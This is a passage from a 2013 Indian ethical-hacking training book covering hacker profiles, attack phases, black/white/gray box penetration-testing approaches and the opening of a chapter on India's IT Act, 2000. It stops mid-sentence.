Intelligent Quotient System Pvt. Ltd.

Ethical Hacking
Module-II
 Ethical Hacking Part I

ETHICAL HACKING
PART – I

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 2

 Ethical Hacking Part I

Preface
The purpose of this book is to give an overview of the Cyber World & its
Security. In this book reader will come to know firewalls, IPS, anti-virus
and other security technologies, With shift in computerization and
internet regime, people know facebook, orkut, gmail, yahoo and many
more sites but are not aware of possible threats if proper precaution is
not taken. They don’t know the risk unless and until threat knocks their
door.

The role of ethical hackers or Information Security Experts) is to protect

data and track unauthorized or malicious hackers, especially in sectors
like IT, police services, defence, insurance and banking.

It covers the topics such as Cyber Law, Email Security, Hacking

Methodology, Mobile Security, understanding and prevention from
various computer attacks. In short, it is a blend of technology plus law
teaching you how safely you can use the technology and achieve your
objective.

Why Ethical Hacking?

Today as computer and Internet are used in every home and by every
person, they also require knowledge of securing their computer and
network. Unethical hackers, better known as black hats, are interested
on information systems of government, corporate, public, and private
networks so that they can hack their crucial data and get benefit from it.
Most of organization now relies on cyber networks and their operations
depend on information systems that are maintained, protected, and
secured from exploitation and attack.

Who Is This Book For?

This book is intended to serve the needs of students and to provide
guidance to use the computer network in efficient and secure way.

In addition, concepts are reinforced by real-world examples of digital

attacks and its consequences. These real-world examples, along with
Hands-on Practical’s and Case studies make this book a practical
learning tool.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 3

 Ethical Hacking Part I

INDEX

Ethical Hacking Part I

Content
Chapter 1
Hacking
1.1. Introduction
1.2. Introduction to Hackers
1.3. Hacking Ethical or Unethical
1.4. Ethical hacking Approaches
1.5. Classes of Hackers
Chapter 2
Cyber Laws
2.1. Introduction to Cyber Law
2.2. Background for Cyberlaws
2.3. Cyberlaw concern
2.4. Cyber Crime and IT Act, 2000
2.5. Importance of Cyberlaw
2.6. Offences under the IT Act
2.7. Measures to Prevent Cyber Crime
Chapter 3
OS Footprinting

3.1. Introduction of Footprinting

3.2. Information Gathering
3.3. OS Footprinting tools

Chapter 4
Google Hacking
4.1. Introduction of Google
4.2. Uses of Google Hacking Database
4.3. Google hacking Techniques
4.4. Preventing attacks

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 4

 Ethical Hacking Part I

Chapter 5
Scanning
5.1. Introduction of Scanning
5.2. Types of Scanning
5.3. Scanning Methodology
5.4. Anonymizers
5.5. HTTP Tunneling
5.6. IP Spoofing
Chapter 6
Enumeration
6.1. Introduction
6.2. Enumeration Steps
6.3. Tools for Enumeration
6.4. Null Sessions
6.5. SNMP Enumeration
6.6. Zone Transfer
6.7. Countermeasures

Chapter 7
Sniffers
7.1. Introduction
7.2. Types of Sniffing
7.3. Sniffing Protocols
7.4. Sniffing Tools
7.5. Countermeasures

Chapter 8
Password Cracking
8.1. Introduction
8.2. Attack methods
8.3. Password Cracking Tools
8.4. Web-Based Password Cracking

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 5

 Ethical Hacking Part I

Chapter 9
Email account hacking and tracing

9.1. Introduction
9.2. Email headers
9.3. Trace the e-mail sender
Chapter 10
Telnet and FTP

10.1. Introduction to Telnet

10.2. Use of FTP
10.3. Anonymous FTP login
10.4. Website Defacement

Chapter 11
DOS Attack

11.1. Introduction of DOS

11.2. Types of DoS Attacks
11.3. DDoS Attacks Working
11.4. BOTs/BOTNETs Working
11.5. Forms of denial of service
11.6. Tools for Dos Attack
11.7. Countermeasures

Chapter 12
Hacking Wireless Network

12.1. Introduction
12.2. Overview of WEP, WPA
12.3. Wireless Hacking Techniques
12.4. Secure Wireless Networks Method
12.5. Hacking tools

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 6

 Ethical Hacking Part I

CHAPTER 1
HACKING
Objective
1.1 Introduction of Hacking
1.2 Introduction of Hackers
1.3 Hacking Ethical or Unethical
1.4 Approaches of Ethical Hacking
1.5 Hackers Classes
1

1.1. Hacking
Hacking is an act of penetrating computer systems to gain knowledge
about the system and how it works. Hacking is the act of gaining access
without legal authorization to a computer or computer network or
network resources.

1
http://password-hacking-tips.blogspot.in/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 7
 Ethical Hacking Part I

1.2. 2Hackers
In a simple word - a hacker is a
person who breaks into
computers without owner
permission and who accesses a
computer system by
circumventing its security
system. Technically, a hacker is
someone who is enthusiastic
about computer programming
and all things relating to the
technical workings of a
computer.
Malicious hackers

These can be termed as crackers who try to gain unauthorized access to

computers. This is normally done through the use of a 'backdoor'
program installed on your machine. A lot of crackers also try to gain
access to resources through the use of password cracking software,
which tries billions of passwords to find the correct one for accessing a
computer.

Famous Computer Hackers

1. Kevin Mitnick
3Mitnickis perhaps synonymous with Hacker.
The Department of Justice still refers to him as
"the most wanted computer criminal in United
States history." His accomplishments were
memorialized into two Hollywood movies:
Takedown and Freedom Downtime. Mitnick got
his start by exploiting the Los Angeles bus
punch card system and getting free rides. Then
similar to Steve Wozniak, of Apple, Mitnick
tried Phone Phreaking. Mitnick was first
convicted for hacking into the Digital Equipment Corporation's computer
network and stealing software. Kevin Mitnick gained notoriety in the
1980s as a hacker who allegedly broke into the North American
Aerospace Defense Command (NORAD) when he was 17 years old.

2
realitypod.com
3
twitter.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 8
 Ethical Hacking Part I

Mitnick's reputation seemed to grow with every retelling of his exploits,

eventually leading to the rumor that Mitnick had made the FBI's Most
Wanted list. In reality, Mitnick was arrested several times for hacking
into secure systems, usually to gain access to powerful computer
software.

Mitnick then embarked on a two and a half year coast to coast hacking
spree. He has stated that he hacked into computers, scrambled phone
networks, stole corporate secrets and hacked into the national defense
warning system. His fall came when he hacked into fellow computer
expert and hacker Tsutomu Shimomura's home computer.

Mitnick is now a productive member of society. After serving 5 years and

8 months in solitary confinement, he is now a computer security author,
consultant and speaker.

2. Adrian Lamo
4

Lamo hit major organizations hard, hacking into

Microsoft and The New York Times. Lamo would
use Internet connections at coffee shops,
Kinko's and libraries to achieve his feats
earning him the nickname "The Homeless
Hacker". Lamo frequently found security flaws
and exploited them. He would often inform the
companies of the flaw. Lamo's hit list includes
Yahoo!, Citigroup, Bank of America and
Cingular. Of course White Hat Hackers do this
legally because they are hired by the company to such; Lamo however
was breaking the law.

Lamo's intrusion into The New York Times intranet placed him squarely
into the eyes of the top cyber-crime offenders. For this crime, Lamo was
ordered to pay $65,000 in restitution. Additionally, he was sentenced to
six months home confinement and 2 years’ probation. Probation expired
January of 2007. Lamo now is a notable public speaker and award
winning journalist.

4
celebslists.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 9
 Ethical Hacking Part I

3. Jonathan James

On the other end of the spectrum are the

black hats of the hacking world. At the age
of 16, Jonathan James became the first
juvenile hacker to get sent to prison. He
later admitted that he was just having fun
and looking around and enjoyed the
challenge. James hit high profile
organizations including the Defense Threat
Reduction Agency server, which is an agency of the Department of the
Defense. With this hack he was able to capture usernames and
passwords and view highly confidential emails.

High on James list, James also hacked in NASA computers and stole
software valued at over $1.7 million. The Justice Department was
quoted as saying: "The software stolen by James supported the
International Space Station's physical environment, including control
of the temperature and humidity within the living space." Upon
discovering this hack, NASA had to shut down its entire computer
system costing taxpayers $41,000. Today James aspires to start a
computer security company.

4. Robert Tappan Morris

Morris is the son of a former National

Security Agency scientist named Robert
Morris. Robert is the creator of the Morris
worm. This worm was credited as the first
computer worm spread through the
Internet. Because of his actions, he was the
first person to be prosecuted under the
1986 Computer Fraud and Abuse Act.

Morris created the worm while at Cornell as a student claiming that

he intended to use the worm to see how large the Internet was at the
time. The worm, however, reproduced itself uncontrollably, shutting

5
urbantitan.com
6
worldtop10.net
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 10
 Ethical Hacking Part I

down many computers until they had completely malfunctioned.

Experts claim 6,000 machines were destroyed. Morris was ultimately
sentenced to three years' probation, 400 hours of community service
and assessed a $10,500 fine.
Morris is now a tenured professor at the MIT Computer Science and
Artificial Intelligence Laboratory. His focus is computer network
architecture.

5. Kevin Poulsen

7Kevin Poulsen, or Dark Dante,

specialized in hacking phone systems.
He's famous for hacking the phones of a
radio station called KIIS-FM.Poulsen's
hack allowed only calls originating from
his house to make it through to the
station, allowing him to win in various
radio contests. The FBI began to search
for Poulson, when he hacked into the FBI database and federal
computers for sensitive wiretap information. Poulsen's specialty was
hacking into phone lines and he frequently took over all of a station's
phone lines. Poulson also reactivated old Yellow Page escort telephone
numbers for a partner who operated a virtual escort agency. Poulson
was featured on Unsolved Mysteries and then captured in a
supermarket. He was assessed a sentence of five years.

Since his time in prison, Poulsen has worked as a journalist and was
promoted to senior editor for Wired News. His most popular article
details his work on identifying 744 sex offenders with MySpace
profiles.

It's likely that there are thousands of hackers active online today, but
an accurate count is impossible. Many hackers don't really know what
they are doing -- they're just using dangerous tools. Others know what
they're doing so well that they can slip in and out of systems without
anyone ever knowing.

7
yugworld.in
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 11
 Ethical Hacking Part I

1.2.1.Damage a malicious hacker can do

This depends upon what backdoor program(s) are hiding on your PC.
Different programs can do different amounts of damage. However, most
allow a hacker to smuggle another program onto your PC. This means
that if a hacker can't do something using the backdoor program, he can
easily put something else onto your computer that can. Hackers can see
everything you are doing, and can access any file on your disk. Hackers
can write new files, delete files, edit files, and do practically anything to a
file that could be done to a file. A hacker could install several programs
on to your system without your knowledge. Such programs could also be
used to steal personal information such as passwords and credit card
information

1.3. Can hacking be Ethical?

Many people ask, “Can hacking be
ethical?” Yes! Ethical hackers are
usually security professionals or
network penetration testers who
use their hacking skills and
toolsets for defensive and
protective purposes. Ethical
hackers who are security
professionals test their network
and systems security for
vulnerabilities using the same
tools that a hacker might use to
compromise the network. Any
computer professional can learn the skills of ethical hacking.

As we mentioned earlier, the term cracker describes a hacker who uses

their hacking skills and toolset for destructive or offensive purposes such
as disseminating viruses or performing DoS attacks to compromise or
bring down systems and networks. No longer just looking for fun, these
hackers are sometimes paid to damage corporate reputations or steal or
reveal credit-card information, while slowing business processes and
compromising the integrity of the organization.8

8
http://www.zybeak.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 12
 Ethical Hacking Part I

1.3.1. Ethical Hackers do

Ethical hackers are motivated by different reasons, but their purpose is

usually the same as that of crackers: They’re trying to determine what an
intruder can see on a targeted network or system, and what the hacker
can do with that information. This process of testing the security of a
system or network is known as a penetration test. Hackers break into
computer systems. Contrary to widespread myth, doing this doesn’t
usually involve a mysterious leap of hackerly brilliance, but rather
persistence and the dogged repetition of a handful of fairly well-known
tricks that exploit common weaknesses in the security of target systems.
Accordingly, most crackers are only mediocre hackers.

Many ethical hackers detect malicious hacker activity as part of the

security team of an organization tasked with defending against malicious
hacking activity. When hired, an ethical hacker asks the organization
what is to be protected, from whom, and what resources the company is
willing to expend in order to gain protection.

1.3.2.Skills Required Becoming an Ethical Hacker

Ethical hackers who stay a step ahead of malicious hackers must be

computer systems experts who are
very knowledgeable about
computer programming,
networking and operating systems.
In-depth knowledge about highly
targeted platforms (such as
Windows, UNIX, and Linux) is also
a requirement. Patience,
persistence, and immense
perseverance are important qualities that many hackers possess because
of the length of time and level of concentration required for most
attacks/compromises to pay off. Most ethical hackers are knowledgeable
about security areas and related issues but don’t necessarily have a
strong command of the countermeasure that can prevent attacks. The
following chapters of this book will address both the vulnerabilities and
the countermeasures to prevent certain types of attacks.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 13

 Ethical Hacking Part I

1.3.3.Conducting Ethical Hacking

Ethical hacking is usually conducted in a structured and organized

manner, usually as part of a penetration test or security audit. The depth
and breadth of the systems and applications to be tested are usually
determined by the needs and concerns of the client.

The following steps are a framework for performing a security audit of an

organization:
1. Talk to the client, and discuss the needs to be addressed during
the testing.
2. Prepare and sign nondisclosure agreement (NDA) documents with
the client.
3. Organize an ethical hacking team, and prepare a schedule for
testing.
4. Conduct the test.
5. Analyze the results of the testing, and prepare a report.
6. Present the report to the client.

1.3.4.Ethical Hacking Steps

An ethical hacker follows processes similar to those of a malicious

hacker. The steps to gain and maintain entry into a computer system are
similar no matter what the hacker’s intentions are. Figure 1.1 illustrates
the five phases that hackers generally follow in hacking a system. The
following sections cover these five phases.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 14

 Ethical Hacking Part I

Phases of hacking

Phase 1: Passive and Active Reconnaissance

Passive reconnaissance involves gathering information regarding a

potential target without the targeted individual’s or company’s
knowledge. Passive reconnaissance can be as simple as watching a
building to identify what time employees enter the building and when
they leave. However, it’s usually done using Internet searches or by
Googling an individual or company to gain information. This process is
generally called information gathering. Social engineering and dumpster
diving are also considered passive information-gathering methods.

Sniffing the network is another means of passive reconnaissance and can

yield useful information such as IP address ranges, naming conventions,
hidden servers or networks, and other available services on the system or
network. Sniffing network traffic is similar to building monitoring:
9
ahmedccna.blogspot.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 15
 Ethical Hacking Part I

A hacker watches the flow of data to see what time certain transactions
take place and where the traffic is going.

Active reconnaissance involves probing the network to discover individual

hosts, IP addresses, and services on the network. This usually involves
more risk of detection than passive reconnaissance and is sometimes
called rattling the doorknobs. Active reconnaissance can give a hacker an
indication of security measures in place (is the front door locked?), but
the process also increases the chance of being caught or at least raising
suspicion. Both passive and active reconnaissance can lead to the
discovery of useful information to use in an attack. For example, it’s
usually easy to find the type of web server and the operating system (OS)
version number that a company is using. This information may enable a
hacker to find vulnerability in that OS version and exploit the
vulnerability to gain more access.

Phase 2: Scanning

Scanning involves taking the information discovered during

reconnaissance and using it to examine the network. Tools that a hacker
may employ during the scanning phase can include dialers, port
scanners, network mappers, sweepers, and vulnerability scanners.
Hackers are seeking any information that can help them perpetrate
attack such as computer names, IP addresses, and user accounts.

Phase 3: Gaining Access

This is the phase where the real hacking takes place. Vulnerabilities
discovered during the reconnaissance and scanning phase are now
exploited to gain access. The method of connection the hacker uses for
an exploit can be a local area network (LAN, either wired or wireless),
local access to a PC, the Internet, or offline. Examples include stack-
based buffer overflows, denial of service (DoS), and session hijacking.
These topics will be discussed in later chapters. Gaining access is known
in the hacker world as owning the system.

Phase 4: Maintaining Access

Once a hacker has gained access, they want to keep that access for
future exploitation and attacks. Sometimes, hackers harden the system
from other hackers or security personnel by securing their exclusive
access with backdoors, rootkits, and Trojans. Once the hacker owns the

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 16

 Ethical Hacking Part I

system, they can use it as a base to launch additional attacks. In this

case, the owned system is sometimes referred to as a zombie system.

Phase 5: Covering Tracks

Once hackers have been able to gain and maintain access, they cover
their tracks to avoid detection by security personnel, to continue to use
the owned system, to remove evidence of hacking, or to avoid legal
action. Hackers try to remove all traces of the attack, such as log files or
intrusion detection system (IDS) alarms. Examples of activities during
this phase of the attack include steganography, the use of tunneling
protocols, and altering log files. Steganography and use of tunneling for
purposes of hacking will be discussed in later chapters.

1.4. Ethical hacking Approaches

Ethical hacking is the most extreme form of technical security testing.

Unlike in a penetration test the testers are looking for vulnerabilities
until they found an appropriate one to reach the predefined target. The
aim of ethical hacking is to discover design based security holes and to
exploit trusts.

In addition, important component of a security model, the response from

the internal security teams/equipments are fully assessed. The objectives
of an ethical hacking test are to cover the remaining points which a
typical penetration test lacks.

An ethical hacking test can be separated in multiple approaches, each

aiming for different objectives. Because the goal is to focus on the design
and not on the software itself, the range of elements to audit should be
fairly wide.
1.4.1.Black Box Approach

The Black Box model follows a stochastic approach to the attack. This
signifies that there are many more unknowns or variables to be learned
when utilizing this modus operandi of attack than when one uses other
approaches. However, this does not mean that this method is without
bounds. The static portion of this attack centers on the operational
constraints that are placed upon the hacking team. Perspective of the
Black Box hacker as one who is a distrusted outsider with little or no
knowledge concerning either the network or any security policies in
effect. Therefore, this model assumes that the network attackers proceed

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 17

 Ethical Hacking Part I

from the unknown to the known much as a criminal hacker would in real
life during the initial phases of the attack. However, one must also
differentiate between the various kinds of criminal hackers in order to
determine which categories of attackers will be used during the Black
Box test. There are four basic competencies or types of criminal hackers:
script kiddies or novices, technically astute hackers, sophisticated
hackers, and disgruntled insider attackers.

1.4.2.White Box Approach

The White Box approach is another attack method that may be used by
the Ethical Hacker. This is a more deterministic plan of attack than the
Black Box one. What is meant by this is that the White Box ethical
hacking team will have much more information divulged to them prior
tithe penetration test, so there will be fewer unknowns or variables. Since
the variables are limited, the methods utilized in the attack will probably
be more controlled, hence more deterministic. The rationale behind using
the White Box mode versus the Black Box mode is twofold: time and
money. The ethical hacking team only has a limited amount of time in
order to access the network and the longer it takes them, the more
resources they will have to utilize and ultimately the more it will cost the
customer. By giving the ethical hacker the information about the network
and its security posture in advance, the White Box method can reduce
the amount of investment required to accomplish this task significantly.
However, there are those who feel that the Black Box approach is a more
accurate way to access the strength of a network’s defense because it
illustrates how a criminal hacker might attempt to attack the network.
The criminal hacker may have extensive knowledge of the target
organization since the hacker might have been a previous employee or
because hackers have a great amount of time to gather intelligence.
Since the criminal hacker has had so much time to gather information
about the network, it would be wise to allow the penetration testers to
have access to the internal networks configuration. While there are pros
and cons to any method of penetration testing, it must be reiterated
there is a time and place for each one. The White Box model takes the
approach that the penetration team functions as “trusted insiders” who
have access to the complete details of the internal network. This is not to
say that there will not be any need of reconnaissance done against the
company, rather there may be a real need to do so. There is the distinct
possibility that the customer is very unaware of the boundaries of their
network. If the organization is large, then there is the likelihood that they
are connected to other partners or different divisions within the same
organization that have different levels of security protections and policies
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 18
 Ethical Hacking Part I

in place. If this is in fact the case, then it would be a grave disservice to

the client for the ethical hacking team to fail to explore this. In addition,
it must be stated that the White Box team will use the same tools and
similar methods as the Black Box team. The difference between the two
approaches is more in terms of the degree of usage and the amount time
needed to utilize them in the attack.

There are three main groups of personnel in the organization for the
penetration team to bring into play in order to obtain the information
they need for the White Box attack: upper management, technical
support management and human resources working in conjunction with
the legal department. Each group will provide a different expertise and
viewpoint for the penetration team. Collectively employed, these three
groups will provide the framework for the attack process.

1.4.3.Gray Box Approach

The Gray Box approach is essentially a hybrid attack model. It

incorporates elements of both the Black Box and the White Box methods.
There are two players in this scenario: the untrusted outsider who is
working with the trusted insider to compromise the network. Basically,
this attack model allows for many interesting possibilities. The outsider
may be in the process of initiating Black Box reconnaissance attacks
while the insider is feeding important information to him or her. Now the
external hacker will be able to tailor the scope of these attacks to the
areas of true vulnerability. As with any attack model, the ultimate focus
and direction comes from the client’s management team. They will
determine the criteria for specifying the rules of engagement and will
dictate what levels of knowledge will be revealed to the hacking team.
Therefore, the ethical hacking members may have to play different roles
for this approach, some acting as insiders while others are acting as
outsiders. This will posit some interesting problems for the team. First,
the management will have to determine what sort of communications
channels will be allowed between the insiders and the outsiders. If the
rules of engagement presuppose that the external attackers are
thousands of miles away, then it would not be appropriate for the Black
Box team to get with the White Box team at the end of the day to
compare notes. Second, the ethical attack team must have a contingency
plan in place should it just so happen that the communication link
between insider and the outsider becomes broken, (remember, there may
be various scenarios acted out during the attack). The team must bready
to revert to a pure Black Box approach if this transpires. Since it may not
be possible to regain insider access again, they must use any insider
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 19
 Ethical Hacking Part I

information previously obtained in a judicious fashion. One possible

drawback to using the Gray Box approach is one that may also be seen
in the White Box approach. When resources are revealed tithe attack
team, there is the tendency to overlook vulnerabilities that aren’t readily
apparent. The attack team has the information that it is looking for, but
they aren’t forced to scrutinize the network, so things are overlooked. The
way to avoid this issue is to ensure that the test team has a definitive
methodology to their attack models. By following checklists and using
established procedures, this is less likely to happen.

1.5. Classes of Hackers

1.5.1.White hat
10

A white hat hacker breaks security for non-malicious

reasons, for instance testing their own security
system. This type of hacker enjoys learning and
working with computer systems, and consequently
gains a deeper understanding of the subject. Such people normally go on
to use their hacking skills in legitimate ways, such as becoming security
consultants.

1.5.2.Grey hat
11A grey hat hacker is a hacker of ambiguous ethics
and/or borderline legality. A grey hat, in the hacking
community, refers to a skilled hacker who sometimes
acts illegally, sometimes in good will, and sometimes
not. They are a hybrid between white and black hat
hackers. They usually do not hack for personal gain or have malicious
intentions, but may or may not occasionally commit crimes during the
course of their technological exploits.
In April 2000, grey hat hackers gained unauthorized access to
apache.org. These people could have tried to damage apache.org servers,
write text offensive to Apache crew, or distribute Trojans or other
malicious actions. Instead, they chose just to alert Apache crew of the
problems and then publish security alert text.

10
harix-in.blogspot.com
11
wildwingshackers.blogspot.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 20
 Ethical Hacking Part I

1.5.3.Black hat

A black hat hacker, sometimes called "cracker", is

someone who breaks computer security without
authorization or uses technology (usually a
computer, phone system or network) for
vandalism, credit card fraud, identity theft, piracy, or other types of
illegal activity. They may use computers to attack systems for profit, for
fun, or for political motivations or as a part of a social cause.

1.5.4.Script kiddies
A script kiddie is a non-expert who breaks into computer systems by
using pre-packaged automated tools written by others, usually with little
understanding. These are the outcasts of the hacker community. It is
generally assumed that script kiddies are juveniles who lack the ability to
write sophisticated hacking programs or exploits on their own, and that
their objective is to try to impress their friends or gain credit in
computer-enthusiast communities.
Script kiddies have at their disposal a large number of effective, easily
downloadable malicious programs capable of harassing even advanced
computers and networks. Such programs have included WinNuke
applications, Back Orifice, NetBus, Sub7, Metasploit, ProRat,
PassJacker, iStealer, Snoopy, Locust Bot and/or software intended for
legitimate security auditing. Another simple means of attack is a mass
mailer worm. These are spread through e-mails and, once opened, they
can be automatically sent throughout entire systems, often without the
users realizing it.

1.5.5.Hacktivist
A hacktivist is a hacker who utilizes technology to announce a social,
ideological, religious, or political message. And hacktivism is hacking for
some cause. In general, most hacktivism involves website defacement or
denial-of-service attacks. In more extreme cases, hacktivism is used as
tool for Cyber terrorism. Hacktivists are also known as Neo Hackers.12

12
http://professionalhackers.webs.com/whatishacking.htm
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 21
 Ethical Hacking Part I

CHAPTER 2

CYBER LAWS
Objective
2.1 Introduction of Cyber Law
2.2 Background for Cyber Law
2.3 Concern of Cyber Law
2.4 Cyber Crime and IT Act, 2000
2.5 Importance of Cyber Law
2.6 Offences under the IT Act
2.7 Measures to Prevent Cyber Crime

2.1. Cyber Law13

Cyber law is a new phenomenon having emerged much after the onset of
Internet. Internet grew in a completely unplanned and unregulated
manner. Even the inventors of Internet could not have really anticipated
the scope and far reaching consequences of cyberspace. The growth rate
of cyberspace has been enormous.

With the spontaneous and almost phenomenal growth of cyberspace,

new issues relating to various legal aspects of cyberspace began cropping
up. In response to newly emerging legal issues relating to cyberspace,
CYBERLAW or the law of Internet came into being. The growth of
Cyberspace has resulted in the development of a new and highly
specialized branch of law called CYBERLAWS- LAWS OF THE INTERNET
AND THE WORLD WIDE WEB.

13
cyberlaws.net
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 22
 Ethical Hacking Part I

2.2. Background for Cyber Laws

Since the beginning of civilization, man has always been motivated by

the need to make progress and better the existing technologies. This has
led to tremendous development and progress which has been a
launching pad for further development. Of all the significant advances
made by mankind from the beginning till date, probably the important of
them is the development of Internet. To put in a common man’s
language, Internet is a global network of computers, all of them speaking
the same language. In 1969, America's Department of Defense
commissioned the construction of a Super network called ARPANET. The
Advanced Research Projects Agency Network (ARPANET) basically
intended as a military network of 40 computers connected by a web of
links & lines. This network slowly grew and the Internet was born. By
1981, over 200 computers were connected from all around the world.
Now the figure runs into millions.

The real power of today's Internet is that it is available to anyone with

a computer and a telephone line. Internet places at an individual's hands
the immense and invaluable power of information and communication.

Internet usage has significantly increased over the past few years. The
number of data packets which flowed through the Internet has increased
dramatically. According to International Data Corporation ("IDC"),
approximately there were more than 450 million mobile Internet users
worldwide in 2009, a number that is expected to more than double by
the end of 2013.Worldwide, more than 624 million Internet users will
make online purchases in 2009, totaling nearly $8 trillion. By 2013,
worldwide e-commerce transactions will be worth more than $16 trillion.
China continues to have more Internet users than any other country,
with 359 million in 2009. This number is expected to grow to 566 million
by 2013. The United States had 261 million Internet users in 2009, a
figure that will reach 280 million in 2013. India will have one of the
fastest growing Internet populations, growing almost two-fold between
2009 and 2013. For more information about statistics you can visit
www.internetworldstats.com/stats.htm.

If left to its own measure, it is highly unlikely that such a trend can
reverse itself. Given this present state of the Internet, the necessity of
Cyber laws becomes all the more important.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 23

 Ethical Hacking Part I

2.3. Does Cyber law concern you?

14Yes, Cyber law does concern you. As the
nature of Internet is changing and this new
medium is being seen as the ultimate medium
ever evolved in human history, every activity of
yours in Cyberspace can and will have a Cyber
legal perspective. From the time you register
your Domain Name, to the time you set up your
web site, to the time you promote your website,
to the time when you send and receive emails,
to the time you conduct electronic commerce transactions on the said
site, at every point of time, there are various Cyber law issues involved.
You may not be bothered about these issues today because you may feel
that they are very distant from you and that they do not have an impact
on your Cyber activities. But sooner or later, you will have to tighten
your belts and take note of Cyber law for your own benefit.

For example, you may knowingly or unknowingly book a Domain Name,

say www.xyx.com which may be the trade mark of any other company,
person or legal entity in any part of the world, say B. Domain Names are
given to you on first come first served basis. But you may be involved by
the other party being B in a Cyber legal dispute which may allege that
you are deliberately involved in the practice of Cyber squatting (the
practice of knowingly registering the trade mark of any legal entity,
company or person with the intention of holding on to it and thereafter
selling the same to the said legal entity, company or person at a
handsome premium). You may also be involved in Cyber litigation as the
concerned party, B, may approach the World Intellectual Property
Organization (WIPO) for adjudicating the matter and WIPO by a summary
procedure may direct you to relinquish and release the said Domain
Name to B, the concerned party. Needless to say, it shall be incumbent
on the concerned party, B, to produce all documentary and other
evidence to substantiate its claim to the concerned Domain Name.

This is just one of the many examples that show the importance of Cyber
law for you.

14
emcydesign.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 24
 Ethical Hacking Part I

2.4. Cyber Crime and IT Act

CYBER CRIME IS AN EVIL HAVING ITS ORIGIN IN THE GROWING
DEPENDENCE ON COMPUTERS IN MODERN LIFE.

“A simple yet sturdy definition of cybercrime would be unlawful acts

wherein the computer is either a tool or a target or both”. Defining
cybercrimes, as “acts that are punishable by the information
Technology Act” would be unsuitable as the Indian Penal Code also
covers many cybercrimes, such as e-mail spoofing, cyber defamation,
etc.

Cybercrime in a narrow sense (computer crime): Any illegal behavior

directed by means of electronic operations that targets the security of
computer systems and the data processed by them.

Cybercrime in a broader sense computer-related crime: Any illegal

behavior committed by means of, or in relation to, a computer system or
network, including such crimes as illegal possession and offering or
distributing information by means of a computer system or network.15

Therefore, Cybercrimes can involve criminal activities that are traditional

in nature, such as theft, fraud, forgery, defamation and mischief, all of
which are subject to the Indian Penal Code. The abuse of computers has
also given birth to a gamut of new age crimes that are addressed by the
Information Technology Act, 2000.
16

Cyber Law in India

When Internet was developed, the

founding fathers of Internet hardly had
any inclination that Internet could
transform itself into an all pervading
revolution which could be misused for
criminal activities and which required
regulation. Today, there are many
disturbing things happening in
cyberspace. Due to the anonymous
nature of the Internet, it is possible to engage into a variety of criminal
activities with impunity and people with intelligence, have been grossly

15
http://www.cyberlawclinic.org/cybercrime.htm
16
perfectlawyers.org
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 25
 Ethical Hacking Part I

misusing this aspect of the Internet to perpetuate criminal activities in

cyberspace. Hence the need for Cyber laws in India.

India passed the Information Technology Act, 2000 to deal with the
emerging cyber issues. It aims to provide for the legal framework so that
legal sanctity is accorded to all electronic records and transactions
carried out by the means of electronic data interchange and other means
of electronic communication (e-commerce). However, it does not deal with
major issues like Spamming, Cyber Stalking, and Phising etc. Now it has
been amended in IT Act 2008, discuss later in this chapter – offence and
defense section.
In May 2000, both the houses of the Indian Parliament passed the
Information Technology Bill. The Bill received the assent of the President
in August 2000 and came to be known as the Information Technology
Act, 2000. Cyber laws are contained in the IT Act, 2000. This Act aims to
provide the legal infrastructure for e-commerce in India. And the cyber
laws have a major impact for e-businesses and the new economy in
India. So, it is important to understand what are the various perspectives
of the IT Act, 2000 and what it offers.

2.5. Importance and Need of Cyber Law: IT Act

Cyber law is important because it touches almost all aspects of
transactions and activities on and concerning the Internet, the World
Wide Web and Cyberspace. Initially it may seem that Cyber laws are a
very technical field and that it does not have any bearing to most
activities in Cyberspace. But the actual truth is that nothing could be
further than the truth. Whether we realize it or not, every action and
every reaction in Cyberspace has some legal and Cyber legal
perspectives.17

The IT Act, 2000 is India's cyber law, is seen as an essential component

of criminal justice system all over the world. The same applies to cyber
law of India as well. In the Indian context, the Information Technology
Act, 2000 (IT Act, 2000) is the cyber law of India. It is the exclusive law in
this regard and is under the process of amendments. India has done a
good job by enacting a cyber-law. It is the 12th country of the world
having a cyber-law. It covers areas like e-governance, e-commerce, cyber
contraventions and cyber offences. However, some critics and cyber law

17
http://www.cyberlaws.net/cyberindia/cybfaq.htm
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 26
 Ethical Hacking Part I

experts have questioned the strength of IT Act, 2000. It would be prudent

to analyze the exact position that applies to the Indian cyber law.
Success in any field of human activity leads to crime that needs
mechanisms to control it. Legal provisions should provide assurance to
users, empowerment to law enforcement agencies and deterrence to
criminals. The law is as stringent as its enforcement. Crime is no longer
limited to space, time or a group of people. Cyber space creates moral,
civil and criminal wrongs. It has now given a new way to express criminal
tendencies. Back in 1990, less than 100,000 people were able to log on
to the Internet worldwide. Now around 500 million people are hooked up
to surf the net around the globe.
Until recently, many information
technology (IT) professionals lacked
awareness of an interest in the cyber
crime phenomenon. In many cases,
law enforcement officers have lacked
the tools needed to tackle the
problem; old laws didn’t quite fit the
crimes being committed, new laws
hadn’t quite caught up to the reality
of what was happening, and there were few court precedents to look18 to
for guidance. Furthermore, debates over privacy issues hampered the
ability of enforcement agents to gather the evidence needed to prosecute
these new cases. Finally, there was a certain amount of antipathy—or at
the least, distrust— between the two most important players in any
effective fight against cyber crime: law enforcement agencies and
computer professionals. Yet close cooperation between the two is crucial
